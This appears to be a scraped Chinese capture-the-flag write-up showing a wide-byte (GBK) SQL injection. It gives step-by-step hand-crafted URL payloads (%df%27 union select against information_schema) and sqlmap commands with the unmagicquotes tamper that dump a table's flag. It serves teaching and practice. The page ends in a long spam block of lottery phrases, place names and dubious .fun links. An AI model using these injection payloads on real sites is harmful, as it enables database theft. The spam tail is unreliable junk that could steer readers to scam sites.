• (宽字节注入) 手注+sqlmap

    进入题目后先简单尝试一下。

    分享图片

     

    很明显的宽字节注入。

    宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码.

    手工注入
    1、判断列数:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23
    order by 3 时报错,说明只有两列。

    2、各类信息:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23
    [email protected] : sae-chinalover : 5.5.52-0ubuntu0.14.04.1

    3、库名:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23
    sae-chinalover

    4、表名:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,group_concat(table_name)
    from information_schema.tables
    where table_schema=database()%23
    ctf,ctf2,ctf3,ctf4,news

    5、ctf4表的列名:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,group_concat(column_name)
    from information_schema.columns
    where table_name=0x63746634%23
    id,flag

    这里注意:要将表名ctf4转为16进制

    这里提供一个字符串转16进制的网站:

    http://www.5ixuexiwang.com/str/hex.php

    转了16进制之后记得在前面加上0x

    6、flag列的数据:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,(select flag from ctf4)%23
    flag{this_is_sqli_flag}

    sqlmap跑法
    1、查看有哪些库:
    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs
    这个时侯就要用到一个脚本了:

    脚本名:unmagicquotes.py

    作用:宽字符绕过

    分享图片

     

     

    2、表名:

    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables

    分享图片

     

     

    3、列名:

    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns

     分享图片

     

     

    4、flag列的数据:
    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag

    分享图片

    相关文章
    相关标签/搜索
    四肖八码中特二四六天天好彩免费资料大全香港马会最快开奖现场开奖结果免费资料历史记录大全一肖一码期期准1 一在线查询网 永泰县| 巴南区| 阜宁县| 德令哈市| 正镶白旗| 突泉县| 浑源县| 加查县| 顺昌县| 卢龙县| 隆子县| 九龙坡区| 洛阳市| 中西区| 荣成市| 绥江县| 改则县| 陕西省| 广南县| 连平县| 临沂市| 卓资县| 水城县| 丰城市| 长垣县| 古交市| 马龙县| 石城县| 嵩明县| 乌拉特前旗| 美姑县| 普格县| 拜城县| 南宫市| 长白| 广平县| 子长县| 九龙坡区| 逊克县| 沙雅县| 永丰县| 白水县| 鄄城县| 台南县| 丰县| 白城市| 高密市| 舟曲县| 奇台县| SHOW| 依兰县| 昔阳县| 南涧| 红安县| 营口市| 伊宁县| 内黄县| 黄山市| 左贡县| 杭锦后旗| 江门市| 阳城县| 井冈山市| 都兰县| 上虞市| 运城市| 罗城| 海丰县| 开平市| 抚顺县| 徐闻县| 军事| 彩票| 五寨县| 衡东县| 鹤庆县| 龙川县| 基隆市| 临夏市| 西安市| 黑水县| 札达县| 夹江县| 南平市| 卓资县| 临漳县| 嵊州市| 平安县| 沁水县| 洛阳市| 靖州| 谢通门县| 开阳县| 正定县| 长海县| 台北县| 龙胜| 兰考县| 抚顺县| 上林县| 突泉县| 津市市| 关岭| 天台县| 郁南县| 宕昌县| 平定县| 通辽市| 盐城市| 德州市| 铜鼓县| 西昌市| 恩平市| 茶陵县| 巴林右旗| 凌海市| 广元市| 高要市| 福安市| 阜新| 和硕县| 石柱| 辽宁省| 郑州市| 安阳市| 蕉岭县| 营山县| 龙门县| 历史| 改则县| 梁山县| 称多县| 佛冈县| 南康市| 龙里县| 玉屏| 温州市| 鄂伦春自治旗| 花垣县| 蓝田县| 安塞县| 合川市| 安丘市| 宝应县| 宜君县| 宁都县| 闵行区| 改则县| 肇源县| 石屏县| 樟树市| 麻江县| 新和县| 阜康市| 通江县| 南澳县| 龙山县| 宁化县| 商城县| 山东省| 洪湖市| 虹口区| 米林县| 桓台县| 玛沁县| 二连浩特市| 琼结县| 固安县| 平潭县| 金溪县| 延津县| 潞西市| 盐源县| 揭阳市| 进贤县| 忻州市| 宝兴县| 江都市| 沙湾县| 泗水县| 盐津县| 蒙城县| 金秀| 出国| 麻阳| 弥渡县| 泾川县| 喀喇| 内江市| 娄底市| 东阳市| 高碑店市| 聂拉木县| 全州县| 曲周县| 徐闻县| 峨山| 全椒县| 确山县| 日喀则市| 彭阳县| 和平区| 东乌| 滦平县| 伊吾县| 西安市| 安顺市| 云浮市| 五华县| 公主岭市| 大关县| 宝清县| 新密市| 金昌市| 赤峰市| 台安县| 肇东市| 宁波市| 应城市| 会同县| 紫金县| 长乐市| 宁陵县| 湖口县| 宣城市| 迁安市| 新津县| 定州市| 广水市| 温泉县| 酉阳| 孝义市| 南昌市| 内黄县| 宣城市| 鹰潭市| 抚远县| 河东区| 禄丰县| 长丰县| 绥滨县| 温泉县| 湘潭市| 根河市| 廉江市| 三原县| 霞浦县| 崇州市| 怀安县| 孝感市| 万源市| 淳化县| 和静县| 酒泉市| 正阳县| 牡丹江市| 特克斯县| 稻城县| 恩施市| 台湾省| 福建省| 临武县| 花莲市| 沧源| 延川县| 肥西县| 舞阳县| 高青县| 固镇县| 潢川县| 普兰店市| 长阳| 张家港市| 湘西| 双牌县| 巢湖市| 遵义县| 商都县| 连平县| 长顺县| 明水县| 秭归县| 雷州市| 桂东县| 荥经县| 湘阴县| 苍南县| 前郭尔| 波密县| 子长县| 万载县| 阜新| 翁牛特旗| 福海县| 大安市| 璧山县| 巴青县| 曲周县| 平乡县| 常熟市| 公主岭市| 长岭县| 泗阳县| 无极县| 屯门区| 龙里县| 原平市| 枣阳市| 通州区| 普宁市| 大田县| 绥阳县| 渭源县| 兴城市| 嘉定区| 博野县| 邯郸县| 洱源县| 上蔡县| 宣城市| 镇宁| 政和县| 大关县| 永定县| 凯里市| 花莲市| 双鸭山市| 锦屏县| http://3g.bo2020cozpacts.fun http://3g.bo2020rezoves.fun http://3g.yqo9j2rl1v.fun http://3g.yqo6j6rl8v.fun http://3g.jvz0j8r2o.fun http://3g.bo2020zentions.fun http://3g.bo2020hops.fun http://3g.gz1980guessc.fun http://3g.yqo6j3rl0v.fun http://3g.bo2020zoons.fun http://3g.gz1980ringc.fun http://3g.yqo7j1rl4v.fun http://3g.bo2020initials.fun http://3g.gz1980parallelc.fun http://3g.yqo8j4rl9v.fun http://3g.bo2020negatives.fun http://3g.gz1980yellowc.fun http://3g.gz1980bandc.fun